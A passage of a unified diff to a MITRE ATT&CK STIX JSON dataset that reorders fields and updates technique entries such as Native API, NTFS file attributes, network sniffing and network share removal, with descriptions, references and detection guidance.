- "x_mitre_detection": "Monitor processes and command-line arguments for program execution that may be indicative of credential dumping, especially attempts to access or copy the NTDS.dit.",
- "x_mitre_system_requirements": [
- "Access to Domain Controller or backup"
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0",
+ "x_mitre_permissions_required": [
+ "Administrator"
],
"x_mitre_data_sources": [
"Windows event logs",
@@ -16561,13 +17189,12 @@
"PowerShell logs",
"Process monitoring"
],
- "x_mitre_permissions_required": [
- "Administrator"
+ "x_mitre_system_requirements": [
+ "Access to Domain Controller or backup"
],
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_detection": "Monitor processes and command-line arguments for program execution that may be indicative of credential dumping, especially attempts to access or copy the NTDS.dit.",
+ "x_mitre_contributors": [
+ "Ed Williams, Trustwave, SpiderLabs"
]
},
{
@@ -16699,35 +17326,35 @@
],
"modified": "2020-03-29T22:46:56.308Z",
"created": "2020-03-13T20:33:00.009Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_contributors": [
+ "Oddvar Moe, @oddvarmoe",
+ "Red Canary"
],
- "x_mitre_data_sources": [
- "Process command-line parameters",
- "API monitoring",
- "File monitoring"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_system_requirements": [
+ "NTFS partitioned hard drive"
],
- "x_mitre_detection": "Forensic techniques exist to identify information stored in NTFS EA. (Citation: Journey into IR ZeroAccess NTFS EA) Monitor calls to the ZwSetEaFile and ZwQueryEaFile Windows API functions as well as binaries used to interact with EA, (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) and consider regularly scanning for the presence of modified information. (Citation: SpectorOps Host-Based Jul 2017)\n\nThere are many ways to create and interact with ADSs using Windows utilities. Monitor for operations (execution, copies, etc.) with file names that contain colons. This syntax (ex: file.ext:ads[.ext]) is commonly associated with ADSs. (Citation: Microsoft ADS Mar 2014) (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) For a more exhaustive list of utilities that can be used to execute and create ADSs, see https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f.\n\nThe Streams tool of Sysinternals can be used to uncover files with ADSs. The dir /r command can also be used to display ADSs. (Citation: Symantec ADS May 2009) Many PowerShell commands (such as Get-Item, Set-Item, Remove-Item, and Get-ChildItem) can also accept a -stream parameter to interact with ADSs. (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)",
"x_mitre_defense_bypassed": [
"Anti-virus",
"Host forensic analysis",
"Signature-based detection"
],
- "x_mitre_system_requirements": [
- "NTFS partitioned hard drive"
+ "x_mitre_detection": "Forensic techniques exist to identify information stored in NTFS EA. (Citation: Journey into IR ZeroAccess NTFS EA) Monitor calls to the ZwSetEaFile and ZwQueryEaFile Windows API functions as well as binaries used to interact with EA, (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) and consider regularly scanning for the presence of modified information. (Citation: SpectorOps Host-Based Jul 2017)\n\nThere are many ways to create and interact with ADSs using Windows utilities. Monitor for operations (execution, copies, etc.) with file names that contain colons. This syntax (ex: file.ext:ads[.ext]) is commonly associated with ADSs. (Citation: Microsoft ADS Mar 2014) (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) For a more exhaustive list of utilities that can be used to execute and create ADSs, see https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f.\n\nThe Streams tool of Sysinternals can be used to uncover files with ADSs. The dir /r command can also be used to display ADSs. (Citation: Symantec ADS May 2009) Many PowerShell commands (such as Get-Item, Set-Item, Remove-Item, and Get-ChildItem) can also accept a -stream parameter to interact with ADSs. (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)",
+ "x_mitre_data_sources": [
+ "Process command-line parameters",
+ "API monitoring",
+ "File monitoring"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_contributors": [
- "Oddvar Moe, @oddvarmoe",
- "Red Canary"
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
"id": "attack-pattern--391d824f-0ef1-47a0-b0ee-c59a75e27670",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Native API",
- "description": "Adversaries may interact with the native Windows application programming interface (API) to execute behaviors. Similar to the system call interface on UNIX systems, the Windows native API provides a controlled means to calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes. The native API is leveraged by the OS during system boot (when other system components are not yet initialized) but is also exposed to user-mode applications via ntdll.dll and ntoskrnl.exe.(Citation: Microsoft NativeAPI)\n\nFunctionality provided by the native API is also available via the Windows API, which provides a documented programming interface. For example, functions such as the Windows API CreateProcess will allow programs and scripts to start other processes with proper path and argument parameters.(Citation: Microsoft CreateProcess) This allows API callers to execute a binary, run a CLI command, load modules, etc. Thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)\n\nOther software frameworks, such as Microsoft .NET, are also available to interact with the native API. These frameworks typically provide wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)\n\nAdversaries may abuse the native API as a means of execution. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API, and its hierarchy of interfaces, provide mechanisms to interact with and utilize a victimized system. ",
+ "description": "Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.\n\nFunctionality provided by native APIs are often also exposed to user-mode applications via interfaces and libraries. For example, functions such as the Windows API CreateProcess() or GNU fork() will allow programs and scripts to start other processes.(Citation: Microsoft CreateProcess)(Citation: GNU Fork) This may allow API callers to execute a binary, run a CLI command, load modules, etc. as thousands of similar API functions exist for various system operations.(Citation: Microsoft Win32)(Citation: LIBC)(Citation: GLIBC)\n\nHigher level software frameworks, such as Microsoft .NET and macOS Cocoa, are also available to interact with native APIs. These frameworks typically provide language wrappers/abstractions to API functionalities and are designed for ease-of-use/portability of code.(Citation: Microsoft NET)(Citation: Apple Core Services)(Citation: MACOS Cocoa)(Citation: macOS Foundation)\n\nAdversaries may abuse these native API functions as a means of executing behaviors. Similar to [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), the native API and its hierarchy of interfaces, provide mechanisms to interact with and utilize various components of a victimized system.",
"external_references": [
{
"source_name": "mitre-attack",
@@ -16735,24 +17362,59 @@
"url": "https://attack.mitre.org/techniques/T1106"
},
{
- "source_name": "Microsoft NativeAPI",
- "url": "https://social.technet.microsoft.com/wiki/contents/articles/11831.the-windows-native-api.aspx",
- "description": "Bruno, L. (2013, July 30). The Windows Native API. Retrieved March 15, 2020."
+ "source_name": "NT API Windows",
+ "url": "https://undocumented.ntinternals.net/",
+ "description": "The NTinterlnals.net team. (n.d.). Nowak, T. Retrieved June 25, 2020."
+ },
+ {
+ "source_name": "Linux Kernel API",
+ "url": "https://www.kernel.org/doc/html/v4.12/core-api/kernel-api.html",
+ "description": "Linux Kernel Organization, Inc. (n.d.). The Linux Kernel API. Retrieved June 25, 2020."
},
{
"url": "http://msdn.microsoft.com/en-us/library/ms682425",
"description": "Microsoft. (n.d.). CreateProcess function. Retrieved December 5, 2014.",
"source_name": "Microsoft CreateProcess"
},
+ {
+ "source_name": "GNU Fork",
+ "url": "https://www.gnu.org/software/libc/manual/html_node/Creating-a-Process.html",
+ "description": "Free Software Foundation, Inc.. (2020, June 18). Creating a Process. Retrieved June 25, 2020."
+ },
{
"source_name": "Microsoft Win32",
"url": "https://docs.microsoft.com/en-us/windows/win32/api/",
"description": "Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved March 15, 2020."
},
+ {
+ "source_name": "LIBC",
+ "url": "https://man7.org/linux/man-pages//man7/libc.7.html",
+ "description": "Kerrisk, M. (2016, December 12). libc(7) \u2014 Linux manual page. Retrieved June 25, 2020."
+ },
+ {
+ "source_name": "GLIBC",
+ "url": "https://www.gnu.org/software/libc/",
+ "description": "glibc developer community. (2020, February 1). The GNU C Library (glibc). Retrieved June 25, 2020."
+ },
{
"source_name": "Microsoft NET",
"url": "https://dotnet.microsoft.com/learn/dotnet/what-is-dotnet-framework",
"description": "Microsoft. (n.d.). What is .NET Framework?. Retrieved March 15, 2020."
+ },
+ {
+ "source_name": "Apple Core Services",
+ "url": "https://developer.apple.com/documentation/coreservices",
+ "description": "Apple. (n.d.). Core Services. Retrieved June 25, 2020."
+ },
+ {
+ "source_name": "MACOS Cocoa",
+ "url": "https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/OSX_Technology_Overview/CocoaApplicationLayer/CocoaApplicationLayer.html#//apple_ref/doc/uid/TP40001067-CH274-SW1",
+ "description": "Apple. (2015, September 16). Cocoa Application Layer. Retrieved June 25, 2020."
+ },
+ {
+ "source_name": "macOS Foundation",
+ "url": "https://developer.apple.com/documentation/foundation",
+ "description": "Apple. (n.d.). Foundation. Retrieved July 1, 2020."
}
],
"object_marking_refs": [
@@ -16765,26 +17427,29 @@
"phase_name": "execution"
}
],
- "modified": "2020-03-15T15:52:05.227Z",
+ "modified": "2020-07-01T16:19:54.646Z",
"created": "2017-05-31T21:31:17.472Z",
- "x_mitre_is_subtechnique": false,
- "x_mitre_version": "2.0",
- "x_mitre_contributors": [
- "Stefan Kanthak"
+ "x_mitre_platforms": [
+ "Windows",
+ "macOS",
+ "Linux"
],
+ "x_mitre_remote_support": false,
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Monitoring API calls may generate a significant amount of data and may not be useful for defense unless collected under specific circumstances, since benign use of API functions are common and difficult to distinguish from malicious behavior. Correlation of other events with behavior surrounding API function calls using API monitoring will provide additional context to an event that may assist in determining if it is due to malicious behavior. Correlation of activity by process lineage by process ID may be sufficient. \n\nUtilization of the Windows API may involve processes loading/accessing system DLLs associated with providing called functions (ex: kernel32.dll, advapi32.dll, user32.dll, and gdi32.dll). Monitoring for DLL loads, especially to abnormal/unusual or potentially malicious processes, may indicate abuse of the Windows API. Though noisy, this data can be combined with other indicators to identify adversary activity. ",
"x_mitre_data_sources": [
+ "System calls",
"Loaded DLLs",
"API monitoring",
"Process monitoring"
],
- "x_mitre_detection": "Monitoring native and Windows API calls may generate a significant amount of data and may not be useful for defense unless collected under specific circumstances, since benign use of Windows API functions such as CreateProcess are common and difficult to distinguish from malicious behavior. Correlation of other events with behavior surrounding API function calls using API monitoring will provide additional context to an event that may assist in determining if it is due to malicious behavior. Correlation of activity by process lineage by process ID may be sufficient. \n\nUtilization of the Windows API may involve processes loading/accessing system DLLs associated with providing called functions (ex: kernel32.dll, advapi32.dll, user32.dll, and gdi32.dll). Monitoring for DLL loads, especially to abnormal/unusual or potentially malicious processes, may indicate abuse of the Windows API. Though noisy, this data can be combined with other indicators to identify adversary activity. ",
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_contributors": [
+ "Stefan Kanthak"
],
- "x_mitre_remote_support": false,
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "2.0",
+ "x_mitre_is_subtechnique": false
},
{
"id": "attack-pattern--bb0e0cb5-f3e4-4118-a4cb-6bf13bfbc9f2",
@@ -16859,25 +17524,25 @@
],
"modified": "2020-03-24T18:28:07.793Z",
"created": "2020-01-24T14:26:51.207Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_contributors": [
- "Matthew Demaske, Adaptforward"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "SYSTEM"
],
+ "x_mitre_detection": "It is likely unusual for netsh.exe to have any child processes in most environments. Monitor process executions and investigate any child processes spawned by netsh.exe for malicious behavior. Monitor the HKLM\\SOFTWARE\\Microsoft\\Netsh registry key for any new or suspicious entries that do not correlate with known system files or benign software. (Citation: Demaske Netsh Persistence)",
"x_mitre_data_sources": [
"Process command-line parameters",
"Process monitoring",
"Windows Registry",
"DLL monitoring"
],
- "x_mitre_detection": "It is likely unusual for netsh.exe to have any child processes in most environments. Monitor process executions and investigate any child processes spawned by netsh.exe for malicious behavior. Monitor the HKLM\\SOFTWARE\\Microsoft\\Netsh registry key for any new or suspicious entries that do not correlate with known system files or benign software. (Citation: Demaske Netsh Persistence)",
- "x_mitre_permissions_required": [
- "Administrator",
- "SYSTEM"
+ "x_mitre_contributors": [
+ "Matthew Demaske, Adaptforward"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"external_references": [
@@ -16923,6 +17588,19 @@
],
"modified": "2020-03-29T01:11:28.903Z",
"created": "2019-04-17T20:23:15.105Z",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_detection": "Detection of Network DoS can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an Network DoS event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.",
+ "x_mitre_data_sources": [
+ "Sensor health and status",
+ "Network protocol analysis",
+ "Netflow/Enclave netflow",
+ "Network intrusion detection system",
+ "Network device logs"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_impact_type": [
+ "Availability"
+ ],
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -16933,20 +17611,7 @@
"SaaS",
"Azure",
"Office 365"
- ],
- "x_mitre_impact_type": [
- "Availability"
- ],
- "x_mitre_version": "1.0",
- "x_mitre_data_sources": [
- "Sensor health and status",
- "Network protocol analysis",
- "Netflow/Enclave netflow",
- "Network intrusion detection system",
- "Network device logs"
- ],
- "x_mitre_detection": "Detection of Network DoS can sometimes be achieved before the traffic volume is sufficient to cause impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness or services provided by an upstream network service provider. Typical network throughput monitoring tools such as netflow(Citation: Cisco DoSdetectNetflow), SNMP, and custom scripts can be used to detect sudden increases in network or service utilization. Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an Network DoS event as it starts. Often, the lead time may be small and the indicator of an event availability of the network or service drops. The analysis tools mentioned can then be used to determine the type of DoS causing the outage and help with remediation.",
- "x_mitre_is_subtechnique": false
+ ]
},
{
"external_references": [
@@ -16981,21 +17646,31 @@
],
"modified": "2020-03-24T23:45:25.625Z",
"created": "2020-01-10T18:01:03.666Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties. Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.",
"x_mitre_data_sources": [
"Process monitoring",
"File monitoring"
],
- "x_mitre_detection": "Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties. Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ "created": "2017-05-31T21:30:43.915Z",
+ "modified": "2020-03-11T19:55:53.828Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "discovery"
+ }
],
+ "type": "attack-pattern",
+ "id": "attack-pattern--e3a12395-188d-4051-9a16-ea8e14d07b88",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Network Service Scanning",
+ "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system. \n\nWithin cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.",
"external_references": [
{
"source_name": "mitre-attack",
@@ -17008,19 +17683,9 @@
"url": "https://capec.mitre.org/data/definitions/300.html"
}
],
- "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system. \n\nWithin cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.",
- "name": "Network Service Scanning",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "id": "attack-pattern--e3a12395-188d-4051-9a16-ea8e14d07b88",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "discovery"
- }
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "modified": "2020-03-11T19:55:53.828Z",
- "created": "2017-05-31T21:30:43.915Z",
"x_mitre_platforms": [
"Linux",
"Windows",
@@ -17072,8 +17737,8 @@
"external_references": [
{
"source_name": "mitre-attack",
- "external_id": "T1551.005",
- "url": "https://attack.mitre.org/techniques/T1551/005"
+ "external_id": "T1070.005",
+ "url": "https://attack.mitre.org/techniques/T1070/005"
},
{
"url": "https://technet.microsoft.com/bb490717.aspx",
@@ -17097,28 +17762,28 @@
],
"modified": "2020-01-31T12:39:18.816Z",
"created": "2020-01-31T12:39:18.816Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_system_requirements": [
+ "Established network share connection to a remote system. Level of access depends on permissions of the account used."
],
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "User"
+ ],
+ "x_mitre_defense_bypassed": [
+ "Host forensic analysis"
+ ],
+ "x_mitre_detection": "Network share connections may be common depending on how an network environment is used. Monitor command-line invocation of net use commands associated with establishing and removing remote shares over SMB, including following best practices for detection of [Windows Admin Shares](https://attack.mitre.org/techniques/T1077). SMB traffic between systems may also be captured and decoded to look for related network share session and file transfer activity. Windows authentication logs are also useful in determining when authenticated network shares are established and by which account, and can be used to correlate network share activity to other events to investigate potentially malicious activity.",
"x_mitre_data_sources": [
"Authentication logs",
"Packet capture",
"Process command-line parameters",
"Process monitoring"
],
- "x_mitre_detection": "Network share connections may be common depending on how an network environment is used. Monitor command-line invocation of net use commands associated with establishing and removing remote shares over SMB, including following best practices for detection of [Windows Admin Shares](https://attack.mitre.org/techniques/T1077). SMB traffic between systems may also be captured and decoded to look for related network share session and file transfer activity. Windows authentication logs are also useful in determining when authenticated network shares are established and by which account, and can be used to correlate network share activity to other events to investigate potentially malicious activity.",
- "x_mitre_defense_bypassed": [
- "Host forensic analysis"
- ],
- "x_mitre_permissions_required": [
- "Administrator",
- "User"
- ],
- "x_mitre_system_requirements": [
- "Established network share connection to a remote system. Level of access depends on permissions of the account used."
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "attack-pattern--3489cfc5-640f-4bb3-a103-9137b97de79f",
@@ -17169,14 +17834,13 @@
],
"modified": "2020-03-15T00:59:10.149Z",
"created": "2017-12-14T16:46:06.044Z",
- "x_mitre_version": "2.1",
- "x_mitre_data_sources": [
- "Process monitoring",
- "Process command-line parameters",
- "Network protocol analysis",
- "Process use of network"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_contributors": [
+ "Praetorian"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
],
- "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nNormal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nIn cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be sufficient due to benign use during normal operations.",
"x_mitre_platforms": [
"macOS",
"Windows",
@@ -17185,19 +17849,32 @@
"Azure",
"Linux"
],
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nNormal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nIn cloud-based systems, native logging can be used to identify access to certain APIs and dashboards that may contain system information. Depending on how the environment is used, that data alone may not be sufficient due to benign use during normal operations.",
+ "x_mitre_data_sources": [
+ "Process monitoring",
+ "Process command-line parameters",
+ "Network protocol analysis",
+ "Process use of network"
],
- "x_mitre_contributors": [
- "Praetorian"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "2.1"
},
{
- "id": "attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Network Sniffing",
- "description": "Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n\nData captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.\n\nNetwork sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities.",
+ "created": "2017-05-31T21:30:41.399Z",
+ "modified": "2020-03-25T21:03:49.610Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "credential-access"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "discovery"
+ }
+ ],
+ "type": "attack-pattern",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -17210,22 +17887,10 @@
"url": "https://capec.mitre.org/data/definitions/158.html"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "credential-access"
- },
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "discovery"
- }
- ],
- "modified": "2020-03-25T21:03:49.610Z",
- "created": "2017-05-31T21:30:41.399Z",
+ "description": "Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n\nData captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.\n\nNetwork sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities.",
+ "name": "Network Sniffing",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "id": "attack-pattern--3257eb21-f9a7-4430-8de1-d8b6e288f529",
"x_mitre_version": "1.1",
"x_mitre_data_sources": [
"Network device logs",
@@ -17327,10 +17992,14 @@
],
"modified": "2020-03-11T15:09:26.624Z",
"created": "2017-05-31T21:31:10.728Z",
- "x_mitre_version": "2.0",
- "x_mitre_contributors": [
- "Ryan Becwar"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Windows",
+ "Linux",
+ "macOS"
],
+ "x_mitre_network_requirements": true,
+ "x_mitre_detection": "Analyze network traffic for ICMP messages or other protocols that contain abnormal data or are not normally seen within or exiting the network.\n\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)\n\nMonitor and investigate API calls to functions associated with enabling and/or utilizing alternative communication channels.",
"x_mitre_data_sources": [
"Host network interface",
"Netflow/Enclave netflow",
@@ -17339,14 +18008,10 @@
"Packet capture",
"Process use of network"
],
- "x_mitre_detection": "Analyze network traffic for ICMP messages or other protocols that contain abnormal data or are not normally seen within or exiting the network.\n\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)\n\nMonitor and investigate API calls to functions associated with enabling and/or utilizing alternative communication channels.",
- "x_mitre_network_requirements": true,
- "x_mitre_platforms": [
- "Windows",
- "Linux",
- "macOS"
+ "x_mitre_contributors": [
+ "Ryan Becwar"
],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "2.0"
},
{
"external_references": [
@@ -17387,23 +18052,23 @@
],
"modified": "2020-03-14T23:39:50.117Z",
"created": "2020-03-14T23:39:50.117Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
],
+ "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
"x_mitre_data_sources": [
"Packet capture",
"Process use of network",
"Process monitoring",
"Network protocol analysis"
],
- "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -17444,20 +18109,20 @@
],
"modified": "2020-03-26T22:02:25.221Z",
"created": "2020-03-14T18:18:32.443Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_detection": "Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.(Citation: University of Birmingham C2)",
"x_mitre_data_sources": [
"Process monitoring",
"Process use of network",
"Netflow/Enclave netflow",
"Packet capture"
],
- "x_mitre_detection": "Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.(Citation: University of Birmingham C2)",
- "x_mitre_is_subtechnique": false,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"id": "attack-pattern--0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22",
@@ -17526,31 +18191,31 @@
"phase_name": "credential-access"
}
],
- "modified": "2020-03-25T16:25:16.928Z",
+ "modified": "2020-06-09T20:46:00.758Z",
"created": "2017-05-31T21:30:19.735Z",
- "x_mitre_version": "2.0",
- "x_mitre_contributors": [
- "Vincent Le Toux",
- "Ed Williams, Trustwave, SpiderLabs"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Windows",
+ "Linux",
+ "macOS"
],
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "SYSTEM",
+ "root"
+ ],
